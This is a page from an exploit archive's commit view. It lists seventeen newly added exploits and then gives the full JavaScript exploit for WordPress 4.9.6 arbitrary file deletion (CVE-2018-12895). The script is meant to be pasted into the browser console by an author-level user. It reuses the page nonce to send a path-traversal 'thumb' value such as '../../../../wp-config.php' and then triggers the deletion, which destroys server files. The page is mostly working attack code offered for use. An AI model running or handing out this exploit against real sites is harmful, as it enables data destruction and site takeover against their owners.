358c35770a
17 changes to exploits/shellcodes Netgear Genie 2.4.64 - Unquoted Service Path OpenClinic GA 5.194.18 - Local Privilege Escalation Gestionale Open 11.00.00 - Local Privilege Escalation Hikvision Web Server Build 210702 - Command Injection WordPress Plugin TaxoPress 3.0.7.1 - Stored Cross-Site Scripting (XSS) (Authenticated) Engineers Online Portal 1.0 - File Upload Remote Code Execution (RCE) Build Smart ERP 21.0817 - 'eidValue' SQL Injection (Unauthenticated) Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2) Balbooa Joomla Forms Builder 2.0.6 - SQL Injection (Unauthenticated) Online Event Booking and Reservation System 1.0 - 'reason' Stored Cross-Site Scripting (XSS) Engineers Online Portal 1.0 - 'multiple' Stored Cross-Site Scripting (XSS) Engineers Online Portal 1.0 - 'multiple' Authentication Bypass Engineers Online Portal 1.0 - 'id' SQL Injection WordPress Plugin Media-Tags 3.2.0.2 - Stored Cross-Site Scripting (XSS) WordPress Plugin Ninja Tables 4.1.7 - Stored Cross-Site Scripting (XSS) Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated) (2) phpMyAdmin 4.8.1 - Remote Code Execution (RCE)
66 lines
No EOL
2.1 KiB
JavaScript
66 lines
No EOL
2.1 KiB
JavaScript
# Exploit Title: Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated) (2)
|
|
# Date: 04/08/2021
|
|
# Exploit Author: samguy
|
|
# Vulnerability Discovery By: Slavco Mihajloski & Karim El Ouerghemmi
|
|
# Vendor Homepage: https://wordpress.org
|
|
# Software Link: https://wordpress.org/wordpress-4.9.6.tar.gz
|
|
# Version: 4.9.6
|
|
# Tested on: Linux - Debian Buster (PHP 7.3)
|
|
# Ref : https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution
|
|
# EDB : EDB-44949
|
|
# CVE : CVE-2018-12895
|
|
|
|
/*
|
|
|
|
Usage:
|
|
1. Login to wordpress with privileges of an author
|
|
2. Navigates to Media > Add New > Select Files > Open/Upload
|
|
3. Click Edit > Open Developer Console > Paste this exploit script
|
|
4. Execute the function, eg: unlink_thumb("../../../../wp-config.php")
|
|
*/
|
|
|
|
function unlink_thumb(thumb) {
|
|
|
|
$nonce_id = document.getElementById("_wpnonce").value
|
|
if (thumb == null) {
|
|
console.log("specify a file to delete")
|
|
return false
|
|
}
|
|
if ($nonce_id == null) {
|
|
console.log("the nonce id is not found")
|
|
return false
|
|
}
|
|
|
|
fetch(window.location.href.replace("&action=edit",""),
|
|
{
|
|
method: 'POST',
|
|
credentials: 'include',
|
|
headers: {'Content-Type': 'application/x-www-form-urlencoded'},
|
|
body: "action=editattachment&_wpnonce=" + $nonce_id + "&thumb=" + thumb
|
|
})
|
|
.then(function(resp0) {
|
|
if (resp0.redirected) {
|
|
$del = document.getElementsByClassName("submitdelete deletion").item(0).href
|
|
if ($del == null) {
|
|
console.log("Unknown error: could not find the url action")
|
|
return false
|
|
}
|
|
fetch($del,
|
|
{
|
|
method: 'GET',
|
|
credentials: 'include'
|
|
}).then(function(resp1) {
|
|
if (resp1.redirected) {
|
|
console.log("Arbitrary file deletion of " + thumb + " succeed!")
|
|
return true
|
|
} else {
|
|
console.log("Arbitrary file deletion of " + thumb + " failed!")
|
|
return false
|
|
}
|
|
})
|
|
} else {
|
|
console.log("Arbitrary file deletion of " + thumb + " failed!")
|
|
return false
|
|
}
|
|
})
|
|
} |